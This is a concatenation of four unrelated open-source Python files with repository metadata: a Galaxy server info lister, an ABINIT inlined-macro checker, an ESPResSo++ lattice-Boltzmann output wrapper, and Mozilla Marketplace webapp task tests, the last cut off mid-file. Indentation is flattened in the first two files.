import argparse
import sys
from bioblend import galaxy
########### Constant(s) ###########
MOTIF = "toolshed"
########### Function(s) ###########
def list_toolsheds_from_gi(gi):
"""
Print the list of different toolsheds used for installation
on the Galaxy server
"""
dico_toolsheds = {}
for tool in gi.tools.get_tools():
if MOTIF in tool['id']:
elements = tool['id'].split('/')
            # Save information in a dictionary
if not elements[0] in dico_toolsheds.keys():
dico_toolsheds[elements[0]] = 1
print ("\n----- Names of toolsheds used on " + gi.base_url)
for toolshed in dico_toolsheds.keys():
print (" --> " + toolshed)
def list_owners_from_gi(gi):
"""
Print the list of different owners of tools installed
from toolshed(s) on the Galaxy server
"""
dico_owners = {}
for tool in gi.tools.get_tools():
if MOTIF in tool['id']:
elements = tool['id'].split('/')
            # Save information in a dictionary
if not elements[2] in dico_owners.keys():
dico_owners[elements[2]] = 0
dico_owners[elements[2]] += 1
print ("\n----- Names of owners from toolsheds used on " + gi.base_url)
for owner in dico_owners.keys():
print (" --> " + owner + ": " + str(dico_owners[owner]) + " tool(s)")
def list_tools_number(gi):
"""
Print number of tools from the Galaxy instance
"""
cpt_all = 0
cpt_toolshed = 0
for tool in gi.tools.get_tools():
cpt_all += 1
if MOTIF in tool['id']:
cpt_toolshed += 1
print ("\n----- Number of tools on " + gi.base_url)
print ("Total number of tools: " + str(cpt_all) + ".")
print ("Number of tools installed from a toolshed: " + str(cpt_toolshed) + ".")
########### Main ###########
if __name__ == "__main__":
## Parse arguments
parser = argparse.ArgumentParser(description='List information about a Galaxy server')
parser.add_argument('-g', '--galaxy', help='Galaxy server URL', required=True)
parser.add_argument('-k', '--api_key', help='API key from Galaxy', required=True)
parser.add_argument('-t', '--toolsheds', help='List toolsheds from which tools were installed',
action='store_true')
parser.add_argument('-n', '--numbers', help='List numbers of tools installed on the galaxy server \
(with the number coming from toolshed(s))', action='store_true')
parser.add_argument('-o', '--owners', help='List owners of tools coming from toolshed(s) installed \
on the galaxy server', action='store_true')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
galaxy_site = args.galaxy
api_key = args.api_key
list_toolsheds = args.toolsheds
list_owners = args.owners
list_numbers = args.numbers
# ---------------------------------------------------------------------
gi = galaxy.GalaxyInstance(galaxy_site, api_key)
if (list_numbers):
list_tools_number(gi)
if (list_toolsheds):
list_toolsheds_from_gi(gi)
if (list_owners):
list_owners_from_gi(gi)
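    # Example invocation (hypothetical server URL and API key):
    #   python get_galaxy_info.py -g https://usegalaxy.example.org -k <API_KEY> -t -n -o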
|
khillion/galaxyxml-analysis
|
galaxyxml_analysis/get_galaxy_info.py
|
Python
|
mit
| 3,410
|
[
"Galaxy"
] |
04a6149556dce3dfc84e1fe024016c0a99ada69d82ca2ee05d4866eb425a108f
|
#!/usr/bin/env python
"""Search for inlined CPP macros in ABINIT src files"""
__author__ = "M. Giantomassi"
import os
import re
import sys
# Files that will be checked.
re_srcfile = re.compile("\.([Ff]|[Ff]90|finc)$")
def is_srcfile(dirpath, fname):
return re_srcfile.search(fname)
# List of macros that should not be inlined with if statements or other instructions.
# These macros are defined in src/incs/abi_common.h
#
MACRO_NAMES = [
"ABI_ALLOCATE",
"ABI_DEALLOCATE",
"ABI_DATATYPE_ALLOCATE",
"ABI_DATATYPE_DEALLOCATE",
"ABI_MALLOC",
"ABI_FREE",
"ABI_CHECK_ALLOC",
]
# Regular expressions for each macro.
regexps = dict()
for name in MACRO_NAMES:
regexps[name] = re.compile(name + " ?\(.*\)")
#regexps[name] = re.compile(name + "\(.*\)") blanks between macro name and () are not permitted
def wrong_string(string):
    "Return an empty string if input string does not contain inlined macros."
    string = string.strip()
    for macro_name in MACRO_NAMES:
        pattern = regexps[macro_name]
        if macro_name in string and not string.startswith("!"):
            s = re.sub(pattern, "", string, count=0).strip()
            if not s.startswith("!"): return s
    return ""
def abinit_test_generator():
def test_func(abenv):
"""Search for inlined CPP macros in ABINIT src files"""
top = abenv.apath_of("src")
try:
return main(top)
except Exception:
import sys
raise sys.exc_info()[1] # Reraise current exception (py2.4 compliant)
return {"test_func" : test_func}
def main(top):
exit_status = 0
for dirpath, dirnames, files in os.walk(top):
for src in files:
if is_srcfile(dirpath, src):
fpath = os.path.join(dirpath,src)
for lno, line in enumerate(file(fpath)):
#
s = wrong_string(line)
if s:
print "(INLINED MACRO at %s:%d): %s " % (src, lno+1, line)
exit_status += 1
if exit_status > 0:
err_msg = """
Please, avoid instructions like:
if (allocated(arr)) ABI_DEALLOCATE(arr)
When the code is compiled in profile mode, indeed, ABI_DEALLOCATE expands to
the set of Fortran instructions:
deallocate(arr)
call memocc_abi()
These instructions MUST be placed inside an "if then" "end if" block.
This limitation can be lifted, but we need support at the level of the build system.
For the time being, one has to use the more verbose form:
if (allocated(arr)) then
ABI_DEALLOCATE(arr)
end if
This is the list of macros that cannot be inlined:
%(MACRO_NAMES)s
""" % globals()
print err_msg
return exit_status
if __name__ == "__main__":
if len(sys.argv) == 1:
top = "../../../src"
print "-------------------------------------------------------"
print " Searching for inlined CPP macros in ABINIT src files "
print "-------------------------------------------------------"
else:
top = sys.argv[1]
exit_status = main(top)
sys.exit(exit_status)
|
SamKChang/abinit-7.10.5_multipole
|
special/scripts/check_inlined_macros.py
|
Python
|
gpl-3.0
| 2,974
|
[
"ABINIT"
] |
0a27e29ac767ebe251abbaa9a23f1294e5d8c40b7dc8b56f00ead122e7e48b63
|
# Copyright (C) 2012-2016
# Max Planck Institute for Polymer Research
# Copyright (C) 2008-2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
Computes and outputs to the screen the simulation progress (finished step) and
controls mass flux conservation when using MD-to-LB coupling. Ideally, the sum of mass
fluxes should be :math:`0`, i.e. :math:`j_{LB} + j_{MD} = 0`.
.. py:class:: espressopp.analysis.LBOutputScreen(system,lb)
:param std::shared_ptr system: system object defined earlier in the python-script
:param lb_object lb: lattice boltzmann object defined earlier in the python-script
Example:
>>> # initialise output to the screen
>>> outputScreen = espressopp.analysis.LBOutputScreen(system,lb)
>>>
>>> # initialise external analysis object with previously created output object
>>> # and periodicity of invocation (steps):
>>> extAnalysis = espressopp.integrator.ExtAnalyze(outputScreen,100)
>>>
>>> # add the external analysis object as an extension to the integrator
>>> integrator.addExtension( extAnalysis )
"""
from espressopp.esutil import cxxinit
from espressopp import pmi
from espressopp.analysis.LBOutput import *
from _espressopp import analysis_LBOutput_Screen
class LBOutputScreenLocal(LBOutputLocal, analysis_LBOutput_Screen):
def __init__(self, system, latticeboltzmann):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, analysis_LBOutput_Screen, system, latticeboltzmann)
if pmi.isController :
class LBOutputScreen(LBOutput, metaclass=pmi.Proxy):
pmiproxydefs = dict(
cls = 'espressopp.analysis.LBOutputScreenLocal',
pmicall = ["writeOutput", "getLBMom", "getMDMom"]
)
|
espressopp/espressopp
|
src/analysis/LBOutputScreen.py
|
Python
|
gpl-3.0
| 2,481
|
[
"ESPResSo"
] |
5f9835d6f2ccb6ffafe949dc6ee416c66f7d32459d72181d106a853674e6253e
|
# -*- coding: utf-8 -*-
import datetime
import hashlib
import json
import os
import stat
import tarfile
from copy import deepcopy
from tempfile import mkdtemp
from django.conf import settings
from django.core import mail
from django.core.files.storage import default_storage as storage
from django.core.management import call_command
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_, ok_
from requests.exceptions import RequestException
import mkt
import mkt.site.tests
from mkt.developers.models import ActivityLog
from mkt.files.models import File, FileUpload
from mkt.reviewers.models import RereviewQueue
from mkt.site.fixtures import fixture
from mkt.site.helpers import absolutify
from mkt.site.utils import app_factory
from mkt.users.models import UserProfile
from mkt.versions.models import Version
from mkt.webapps.models import AddonUser, Preview, Webapp
from mkt.webapps.tasks import (adjust_categories, dump_app, dump_user_installs,
export_data, fix_excluded_regions,
notify_developers_of_failure, pre_generate_apk,
PreGenAPKError, rm_directory, update_manifests,
zip_apps)
original = {
"version": "0.1",
"default_locale": "en-US",
"name": "MozillaBall",
"description": "Exciting Open Web development action!",
"icons": {
"32": "http://test.com/icon-32.png",
"48": "http://test.com/icon-48.png",
"128": "http://test.com/icon-128.png"
},
"installs_allowed_from": [
"*",
],
"locales": {
"de": {
"name": "Mozilla Kugel"
},
"fr": {
"description": "Testing name-less locale"
}
}
}
new = {
"version": "1.0",
"default_locale": "en-US",
"name": "MozillaBall",
"description": "Exciting Open Web development action!",
"icons": {
"32": "http://test.com/icon-32.png",
"48": "http://test.com/icon-48.png",
"128": "http://test.com/icon-128.png"
},
"installs_allowed_from": [
"*",
],
"locales": {
"de": {
"name": "Mozilla Kugel"
},
"fr": {
"description": "Testing name-less locale"
}
},
"developer": {
"name": "Mozilla",
"url": "http://www.mozilla.org/"
}
}
ohash = ('sha256:'
'fc11fba25f251d64343a7e8da4dfd812a57a121e61eb53c78c567536ab39b10d')
nhash = ('sha256:'
'409fbe87dca5a4a7937e3dea27b69cb3a3d68caf39151585aef0c7ab46d8ee1e')
class TestUpdateManifest(mkt.site.tests.TestCase):
fixtures = fixture('user_2519', 'user_999')
def setUp(self):
UserProfile.objects.get_or_create(id=settings.TASK_USER_ID)
# Not using app factory since it creates translations with an invalid
# locale of "en-us".
self.addon = Webapp.objects.create()
self.version = Version.objects.create(addon=self.addon,
_developer_name='Mozilla')
self.file = File.objects.create(
version=self.version, hash=ohash, status=mkt.STATUS_PUBLIC,
filename='%s-%s' % (self.addon.id, self.version.id))
self.addon.name = {
'en-US': 'MozillaBall',
'de': 'Mozilla Kugel',
}
self.addon.status = mkt.STATUS_PUBLIC
self.addon.manifest_url = 'http://nowhere.allizom.org/manifest.webapp'
self.addon.save()
self.addon.update_version()
self.addon.addonuser_set.create(user_id=999)
with storage.open(self.file.file_path, 'w') as fh:
fh.write(json.dumps(original))
# This is the hash to set the get_content_hash to, for showing
# that the webapp has been updated.
self._hash = nhash
# Let's use deepcopy so nested dicts are copied as new objects.
self.new = deepcopy(new)
self.content_type = 'application/x-web-app-manifest+json'
req_patcher = mock.patch('mkt.developers.tasks.requests.get')
self.req_mock = req_patcher.start()
self.addCleanup(req_patcher.stop)
self.response_mock = mock.Mock(status_code=200)
self.response_mock.iter_content.return_value = mock.Mock(
next=self._data)
self.response_mock.headers = {'content-type': self.content_type}
self.req_mock.return_value = self.response_mock
validator_patcher = mock.patch('mkt.webapps.tasks.validator')
self.validator = validator_patcher.start()
self.addCleanup(validator_patcher.stop)
self.validator.return_value = {}
@mock.patch('mkt.webapps.tasks._get_content_hash')
def _run(self, _get_content_hash, **kw):
# Will run the task and will act depending upon how you've set hash.
_get_content_hash.return_value = self._hash
update_manifests(ids=(self.addon.pk,), **kw)
def _data(self):
return json.dumps(self.new)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
@mock.patch('mkt.webapps.models.copy_stored_file')
def test_new_version_not_created(self, _copy_stored_file, _manifest_json):
# Test that update_manifest doesn't create multiple versions/files.
eq_(self.addon.versions.count(), 1)
old_version = self.addon.current_version
old_file = self.addon.get_latest_file()
self._run()
app = self.addon.reload()
version = app.current_version
file_ = app.get_latest_file()
# Test that our new version looks good.
eq_(app.versions.count(), 1)
eq_(version, old_version, 'Version created')
eq_(file_, old_file, 'File created')
path = FileUpload.objects.all()[0].path
_copy_stored_file.assert_called_with(path,
os.path.join(version.path_prefix,
file_.filename))
_manifest_json.assert_called_with(file_)
@mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
def test_version_updated(self):
self._run()
self.new['version'] = '1.1'
self._hash = 'foo'
self._run()
app = self.addon.reload()
eq_(app.versions.latest().version, '1.1')
def test_not_log(self):
self._hash = ohash
self._run()
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 0)
def test_log(self):
self._run()
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 1)
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_pending(self, mock_):
self.addon.update(status=mkt.STATUS_PENDING)
call_command('process_addons', task='update_manifests')
assert mock_.called
def test_pending_updates(self):
"""
PENDING apps don't have a current version. This test makes sure
everything still works in this case.
"""
self.addon.update(status=mkt.STATUS_PENDING)
self._run()
eq_(self.addon.latest_version.reload().version, '1.0')
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_approved(self, mock_):
self.addon.update(status=mkt.STATUS_APPROVED)
call_command('process_addons', task='update_manifests')
assert mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_ignore_disabled(self, mock_):
self.addon.update(status=mkt.STATUS_DISABLED)
call_command('process_addons', task='update_manifests')
assert not mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_ignore_packaged(self, mock_):
self.addon.update(is_packaged=True)
call_command('process_addons', task='update_manifests')
assert not mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_get_webapp(self, mock_):
eq_(self.addon.status, mkt.STATUS_PUBLIC)
call_command('process_addons', task='update_manifests')
assert mock_.called
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
def test_update_manifest(self, retry, fetch):
fetch.return_value = '{}'
update_manifests(ids=(self.addon.pk,))
assert not retry.called
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
def test_manifest_fetch_fail(self, retry, fetch):
later = datetime.datetime.now() + datetime.timedelta(seconds=3600)
fetch.side_effect = RuntimeError
update_manifests(ids=(self.addon.pk,))
        assert retry.called
# Not using assert_called_with b/c eta is a datetime.
eq_(retry.call_args[1]['args'], ([self.addon.pk],))
eq_(retry.call_args[1]['kwargs'], {'check_hash': True,
'retries': {self.addon.pk: 1}})
self.assertCloseToNow(retry.call_args[1]['eta'], later)
eq_(retry.call_args[1]['max_retries'], 5)
eq_(len(mail.outbox), 0)
def test_notify_failure_lang(self):
user1 = UserProfile.objects.get(pk=999)
user2 = UserProfile.objects.get(pk=2519)
AddonUser.objects.create(addon=self.addon, user=user2)
user1.update(lang='de')
user2.update(lang='en')
notify_developers_of_failure(self.addon, 'blah')
eq_(len(mail.outbox), 2)
ok_(u'Mozilla Kugel' in mail.outbox[0].subject)
ok_(u'MozillaBall' in mail.outbox[1].subject)
def test_notify_failure_with_rereview(self):
RereviewQueue.flag(self.addon, mkt.LOG.REREVIEW_MANIFEST_CHANGE,
'This app is flagged!')
notify_developers_of_failure(self.addon, 'blah')
eq_(len(mail.outbox), 0)
def test_notify_failure_not_public(self):
self.addon.update(status=mkt.STATUS_PENDING)
notify_developers_of_failure(self.addon, 'blah')
eq_(len(mail.outbox), 0)
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
def test_manifest_fetch_3rd_attempt(self, retry, fetch):
fetch.side_effect = RuntimeError
update_manifests(ids=(self.addon.pk,), retries={self.addon.pk: 2})
# We already tried twice before, this is the 3rd attempt,
# We should notify the developer that something is wrong.
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
ok_(msg.subject.startswith('Issue with your app'))
expected = u'Failed to get manifest from %s' % self.addon.manifest_url
ok_(expected in msg.body)
ok_(settings.SUPPORT_GROUP in msg.body)
# We should have scheduled a retry.
assert retry.called
# We shouldn't have put the app in the rereview queue yet.
assert not RereviewQueue.objects.filter(addon=self.addon).exists()
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
@mock.patch('mkt.webapps.tasks.notify_developers_of_failure')
def test_manifest_fetch_4th_attempt(self, notify, retry, fetch):
fetch.side_effect = RuntimeError
update_manifests(ids=(self.addon.pk,), retries={self.addon.pk: 3})
# We already tried 3 times before, this is the 4th and last attempt,
# we shouldn't retry anymore, instead we should just add the app to
# the re-review queue. We shouldn't notify the developer either at this
# step, it should have been done before already.
assert not notify.called
assert not retry.called
assert RereviewQueue.objects.filter(addon=self.addon).exists()
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_manifest_validation_failure(self, _iarc):
# We are already mocking validator, but this test needs to make sure
# it actually saves our custom validation result, so add that.
def side_effect(upload_id, **kwargs):
upload = FileUpload.objects.get(pk=upload_id)
upload.validation = json.dumps(validation_results)
upload.save()
validation_results = {
'errors': 1,
'messages': [{
'context': None,
'uid': 'whatever',
'column': None,
'id': ['webapp', 'detect_webapp', 'parse_error'],
'file': '',
'tier': 1,
'message': 'JSON Parse Error',
'type': 'error',
'line': None,
'description': 'The webapp extension could not be parsed due '
'to a syntax error in the JSON.'
}]
}
self.validator.side_effect = side_effect
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
upload = FileUpload.objects.get()
validation_url = absolutify(reverse(
'mkt.developers.upload_detail', args=[upload.uuid]))
ok_(msg.subject.startswith('Issue with your app'))
ok_(validation_results['messages'][0]['message'] in msg.body)
ok_(validation_url in msg.body)
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_name_change_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['name'] = 'Mozilla Ball Ultimate Edition'
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
ok_(_iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_locale_name_add_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['locales'] = {'es': {'name': 'eso'}}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
log = ActivityLog.objects.filter(
action=mkt.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
eq_(log.details.get('comments'),
u'Locales added: "eso" (es).')
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_locale_name_change_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['locales'] = {'de': {'name': 'Bippity Bop'}}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
log = ActivityLog.objects.filter(
action=mkt.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
eq_(log.details.get('comments'),
u'Locales updated: "Mozilla Kugel" -> "Bippity Bop" (de).')
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_default_locale_change(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['name'] = u'Mozilla Balón'
self.new['default_locale'] = 'es'
self.new['locales'] = {'en-US': {'name': 'MozillaBall'}}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
eq_(self.addon.reload().default_locale, 'es')
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
log = ActivityLog.objects.filter(
action=mkt.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
eq_(log.details.get('comments'),
u'Manifest name changed from "MozillaBall" to "Mozilla Balón". '
u'Default locale changed from "en-US" to "es". '
u'Locales added: "Mozilla Balón" (es).')
ok_(_iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_locale_name_removal_no_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
# Note: Not using `del` b/c copy doesn't copy nested structures.
self.new['locales'] = {
'fr': {'description': 'Testing name-less locale'}
}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 0)
# Log for manifest update.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 1)
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_force_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['name'] = 'Mozilla Ball Ultimate Edition'
# We're setting the hash to the same value.
self.file.update(hash=nhash)
eq_(RereviewQueue.objects.count(), 0)
self._run(check_hash=False)
# We should still get a rereview since we bypassed the manifest check.
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
ok_(_iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_support_locales_change(self, _manifest, _iarc):
"""
Test both PUBLIC and PENDING to catch apps w/o `current_version`.
"""
for status in (mkt.STATUS_PUBLIC, mkt.STATUS_PENDING):
self.addon.update(status=status)
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['locales'].update({'es': {'name': u'Mozilla Balón'}})
self._run()
ver = self.version.reload()
eq_(ver.supported_locales, 'de,es,fr')
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_support_developer_change(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with developer name change.
self.new['developer']['name'] = 'Allizom'
self._run()
ver = self.version.reload()
eq_(ver.developer_name, 'Allizom')
# We should get a re-review because of the developer name change.
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
ok_(_iarc.called)
class TestDumpApps(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def test_dump_app(self):
fn = dump_app(337141)
result = json.load(open(fn, 'r'))
eq_(result['id'], 337141)
def test_zip_apps(self):
dump_app(337141)
fn = zip_apps()
for f in ['license.txt', 'readme.txt']:
ok_(os.path.exists(os.path.join(settings.DUMPED_APPS_PATH, f)))
ok_(os.stat(fn)[stat.ST_SIZE])
latest_tgz = os.path.join(os.path.dirname(fn), 'latest.tgz')
ok_(os.readlink(latest_tgz) == os.path.basename(fn))
@mock.patch('mkt.webapps.tasks.dump_app')
def test_not_public(self, dump_app):
app = Webapp.objects.get(pk=337141)
app.update(status=mkt.STATUS_PENDING)
call_command('process_addons', task='dump_apps')
assert not dump_app.called
def test_removed(self):
# At least one public app must exist for dump_apps to run.
app_factory(name='second app', status=mkt.STATUS_PUBLIC)
app_path = os.path.join(settings.DUMPED_APPS_PATH, 'apps', '337',
'337141.json')
app = Webapp.objects.get(pk=337141)
app.update(status=mkt.STATUS_PUBLIC)
call_command('process_addons', task='dump_apps')
assert os.path.exists(app_path)
app.update(status=mkt.STATUS_PENDING)
call_command('process_addons', task='dump_apps')
assert not os.path.exists(app_path)
@mock.patch('mkt.webapps.tasks.dump_app')
def test_public(self, dump_app):
call_command('process_addons', task='dump_apps')
assert dump_app.called
class TestDumpUserInstalls(mkt.site.tests.TestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestDumpUserInstalls, self).setUp()
# Create a user install.
self.app = Webapp.objects.get(pk=337141)
self.user = UserProfile.objects.get(pk=2519)
self.app.installed.create(user=self.user)
self.hash = hashlib.sha256('%s%s' % (str(self.user.pk),
settings.SECRET_KEY)).hexdigest()
self.path = os.path.join(settings.DUMPED_USERS_PATH, 'users',
self.hash[0], '%s.json' % self.hash)
def tearDown(self):
try:
os.unlink(self.path)
except OSError:
pass
super(TestDumpUserInstalls, self).tearDown()
def dump_and_load(self):
dump_user_installs([self.user.pk])
return json.load(open(self.path, 'r'))
def test_dump_user_installs(self):
data = self.dump_and_load()
eq_(data['user'], self.hash)
eq_(data['region'], self.user.region)
eq_(data['lang'], self.user.lang)
installed = data['installed_apps'][0]
eq_(installed['id'], self.app.id)
eq_(installed['slug'], self.app.app_slug)
self.assertCloseToNow(
datetime.datetime.strptime(installed['installed'],
'%Y-%m-%dT%H:%M:%S'),
datetime.datetime.utcnow())
    def test_dump_excludes_deleted(self):
"""We can't recommend deleted apps, so don't include them."""
app = app_factory()
app.installed.create(user=self.user)
app.delete()
data = self.dump_and_load()
eq_(len(data['installed_apps']), 1)
installed = data['installed_apps'][0]
eq_(installed['id'], self.app.id)
def test_dump_recommendation_opt_out(self):
self.user.update(enable_recommendations=False)
with self.assertRaises(IOError):
# File shouldn't exist b/c we didn't write it.
self.dump_and_load()
class TestFixMissingIcons(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
@mock.patch('mkt.webapps.tasks._fix_missing_icons')
def test_pending(self, mock_):
self.app.update(status=mkt.STATUS_PENDING)
call_command('process_addons', task='fix_missing_icons')
assert mock_.called
@mock.patch('mkt.webapps.tasks._fix_missing_icons')
def test_approved(self, mock_):
self.app.update(status=mkt.STATUS_APPROVED)
call_command('process_addons', task='fix_missing_icons')
assert mock_.called
@mock.patch('mkt.webapps.tasks._fix_missing_icons')
def test_ignore_disabled(self, mock_):
self.app.update(status=mkt.STATUS_DISABLED)
call_command('process_addons', task='fix_missing_icons')
assert not mock_.called
@mock.patch('mkt.webapps.tasks.fetch_icon')
@mock.patch('mkt.webapps.tasks._log')
@mock.patch('mkt.webapps.tasks.storage.exists')
def test_for_missing_size(self, exists, _log, fetch_icon):
exists.return_value = False
call_command('process_addons', task='fix_missing_icons')
# We are checking two sizes, but since the 64 has already failed for
# this app, we should only have called exists() once, and we should
# never have logged that the 128 icon is missing.
eq_(exists.call_count, 1)
        _log.assert_any_call(337141, 'Webapp is missing icon size 64')
        assert (mock.call(337141, 'Webapp is missing icon size 128')
                not in _log.call_args_list)
assert fetch_icon.called
class TestRegenerateIconsAndThumbnails(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
@mock.patch('mkt.webapps.tasks.resize_preview.delay')
def test_command(self, resize_preview):
preview = Preview.objects.create(filetype='image/png', addon_id=337141)
call_command('process_addons', task='regenerate_icons_and_thumbnails')
resize_preview.assert_called_once_with(preview.image_path, preview,
generate_image=False)
@mock.patch('mkt.webapps.tasks.requests')
class TestPreGenAPKs(mkt.site.tests.WebappTestCase):
def setUp(self):
super(TestPreGenAPKs, self).setUp()
self.manifest_url = u'http://some-âpp.net/manifest.webapp'
self.app.update(manifest_url=self.manifest_url)
def test_get(self, req):
res = mock.Mock()
req.get.return_value = res
pre_generate_apk.delay(self.app.id)
assert req.get.called, 'APK requested from factory'
        requested_url = req.get.call_args[0][0]
        assert requested_url.startswith(
            settings.PRE_GENERATE_APK_URL), req.get.mock_calls
assert res.raise_for_status.called, 'raise on bad status codes'
def test_get_packaged(self, req):
self.app.update(manifest_url=None, is_packaged=True)
# Make sure this doesn't raise an exception.
pre_generate_apk.delay(self.app.id)
assert req.get.called, 'APK requested from factory'
def test_no_manifest(self, req):
self.app.update(manifest_url=None)
with self.assertRaises(PreGenAPKError):
pre_generate_apk.delay(self.app.id)
def test_error_getting(self, req):
req.get.side_effect = RequestException
with self.assertRaises(PreGenAPKError):
pre_generate_apk.delay(self.app.id)
class TestExportData(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.export_directory = mkdtemp()
self.app_path = 'apps/337/337141.json'
def tearDown(self):
rm_directory(self.export_directory)
def create_export(self, name):
with self.settings(DUMPED_APPS_PATH=self.export_directory):
export_data(name=name)
tarball_path = os.path.join(self.export_directory,
'tarballs',
name + '.tgz')
return tarfile.open(tarball_path)
def test_export_is_created(self):
expected_files = [
self.app_path,
'license.txt',
'readme.txt',
]
tarball = self.create_export('tarball-name')
actual_files = tarball.getnames()
for expected_file in expected_files:
assert expected_file in actual_files, expected_file
class TestFixExcludedRegions(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_ignore_restricted(self, _mock):
"""Set up exclusions and verify they still exist after the call."""
self.app.geodata.update(restricted=True)
self.app.addonexcludedregion.create(region=mkt.regions.PER.id)
self.app.addonexcludedregion.create(region=mkt.regions.FRA.id)
fix_excluded_regions([self.app.pk])
self.assertSetEqual(self.app.get_excluded_region_ids(),
[mkt.regions.PER.id, mkt.regions.FRA.id])
eq_(self.app.addonexcludedregion.count(), 2)
@mock.patch('mkt.webapps.tasks.index_webapps')
